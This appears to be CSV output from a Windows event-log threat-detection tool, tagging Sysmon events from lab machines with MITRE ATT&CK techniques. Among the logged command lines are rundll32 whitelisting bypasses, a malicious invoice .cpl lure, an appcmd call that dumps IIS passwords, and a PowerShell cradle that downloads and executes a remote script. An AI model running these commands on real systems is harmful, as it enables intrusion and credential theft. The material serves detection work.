",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243534
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:24.993
747F3D96-9F68-5E75-0000-0010B9662000
7420
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243534
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:24.993
747F3D96-9F68-5E75-0000-0010B9662000
7420
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.143393,2019-05-27T05:29:19.143393+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1,"
1
5
4
1
0
0x8000000000000000
5949
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:19.103
365ABB72-3D6F-5CEB-0000-001066B5FF00
2796
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript running script,1564434679.865791,2019-07-30T01:11:19.865791+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("C:\Windows\System32\wscript.exe" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt) and Parent Image :C:\Windows\SysWOW64\rundll32.exe , Parent CommandLine ("C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",) in directory : ( C:\Users\IEUser\AppData\Local\Temp\ )",1,"
1
5
4
1
0
0x8000000000000000
4865
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:11:19.010
747F3D96-60F7-5D3F-0000-00106F2F5600
6160
C:\Windows\SysWOW64\wscript.exe
5.812.10240.16384
Microsoft ® Windows Based Script Host
Microsoft ® Windows Script Host
Microsoft Corporation
"C:\Windows\System32\wscript.exe" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt
C:\Users\IEUser\AppData\Local\Temp\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-0020B5314100
0x4131b5
1
Medium
SHA1=5D7F2AFD2FF69D379B69DD94033B51EC537E8E52,MD5=F2748908C6B873CB1970DF4C07223E72,SHA256=0FBB4F848D9FB14D7BF81B0454203810869C527C3435E8747A2213DD86F8129A,IMPHASH=3602F3C025378F418F804C5D183603FE
747F3D96-60F5-5D3F-0000-0010A8D75500
4884
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1074] Data Staged - Process,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1,"
1
5
4
1
0
0x8000000000000000
4910
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:23.170
747F3D96-6623-5D3F-0000-001011F68700
5816
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1,"
1
5
4
1
0
0x8000000000000000
4910
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:23.170
747F3D96-6623-5D3F-0000-001011F68700
5816
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) ran process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home ) and IP ( 10.0.2.15 ) to hostname ( aka105.inwitelecom.net ) , IP ( 105.73.6.105 ) and port ( 80 )",3,"
3
5
4
3
0
0x8000000000000000
4132
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-21 06:58:40.721
365ABB72-1A29-5CE4-0000-001079F92101
2432
C:\Windows\System32\mshta.exe
IEWIN7\IEUser
tcp
true
false
10.0.2.15
IEWIN7..home
49705
false
105.73.6.105
aka105.inwitelecom.net
80
http
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
1019
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-23 17:26:09.417
365ABB72-D7B1-5CE6-0000-00102CD76D00
2240
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe"
D:\
IEWIN7\IEUser
365ABB72-CE6C-5CE6-0000-002047F30000
0xf347
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-D7B0-5CE6-0000-001077C56D00
3388
\\vboxsrv\HTools\msxsl.exe
msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe)",1,"
1
5
4
1
0
0x8000000000000000
16392
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:33:59.727
365ABB72-20C7-5CD8-0000-001021022500
1416
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-2006-5CD8-0000-0010E0912300
2936
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1,"
1
5
4
1
0
0x8000000000000000
16392
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:33:59.727
365ABB72-20C7-5CD8-0000-001021022500
1416
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-2006-5CD8-0000-0010E0912300
2936
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1,"
1
5
4
1
0
0x8000000000000000
16392
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:33:59.727
365ABB72-20C7-5CD8-0000-001021022500
1416
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-2006-5CD8-0000-0010E0912300
2936
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557681649.458113,2019-05-12T21:20:49.458113+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe ),1,"
1
5
4
1
0
0x8000000000000000
16513
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 17:20:49.261
365ABB72-55F1-5CD8-0000-0010781C3300
2392
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe
C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-4FB5-5CD8-0000-0020F2350100
0x135f2
1
Medium
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-55F1-5CD8-0000-00108A153300
3668
C:\Windows\System32\ftp.exe
"C:\Windows\System32\ftp.exe" -s:c:\users\ieuser\appdata\local\temp\ftp.txt
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.063277,2019-05-27T05:29:19.063277+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1,"
1
5
4
1
0
0x8000000000000000
5946
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:19.023
365ABB72-3D6F-5CEB-0000-0010A6B1FF00
1508
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",)",1,"
1
5
4
1
0
0x8000000000000000
4864
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:11:17.503
747F3D96-60F5-5D3F-0000-0010A8D75500
4884
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
C:\Users\IEUser\Downloads\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-0020B5314100
0x4131b5
1
Medium
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-60F5-5D3F-0000-0010D1CF5500
4356
C:\Windows\System32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1,"
1
5
4
1
0
0x8000000000000000
4864
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:11:17.503
747F3D96-60F5-5D3F-0000-0010A8D75500
4884
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
C:\Users\IEUser\Downloads\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-0020B5314100
0x4131b5
1
Medium
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-60F5-5D3F-0000-0010D1CF5500
4356
C:\Windows\System32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1,"
1
5
4
1
0
0x8000000000000000
4864
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:11:17.503
747F3D96-60F5-5D3F-0000-0010A8D75500
4884
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
C:\Users\IEUser\Downloads\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-0020B5314100
0x4131b5
1
Medium
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-60F5-5D3F-0000-0010D1CF5500
4356
C:\Windows\System32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1558452781.141798,2019-05-21T19:33:01.141798+04:00,,Threat,Critical,"User (IEWIN7\IEUser) ran process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home ) and IP ( 10.0.2.15 ) to hostname ( aka112.inwitelecom.net ) , IP ( 105.73.6.112 ) and port ( 80 )",3,"
3
5
4
3
0
0x8000000000000000
4131
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-21 06:58:40.518
365ABB72-1A29-5CE4-0000-001079F92101
2432
C:\Windows\System32\mshta.exe
IEWIN7\IEUser
tcp
true
false
10.0.2.15
IEWIN7..home
49704
false
105.73.6.112
aka112.inwitelecom.net
80
http
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243532
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:24.985
747F3D96-9F68-5E75-0000-001079652000
3300
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243532
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:24.985
747F3D96-9F68-5E75-0000-001079652000
3300
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243532
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:24.985
747F3D96-9F68-5E75-0000-001079652000
3300
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler calc.exe)",1,"
1
5
4
1
0
0x8000000000000000
16391
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:33:37.063
365ABB72-20B1-5CD8-0000-001064D62400
1844
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe url.dll,FileProtocolHandler calc.exe
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-2006-5CD8-0000-0010E0912300
2936
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1,"
1
5
4
1
0
0x8000000000000000
16391
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:33:37.063
365ABB72-20B1-5CD8-0000-001064D62400
1844
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe url.dll,FileProtocolHandler calc.exe
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
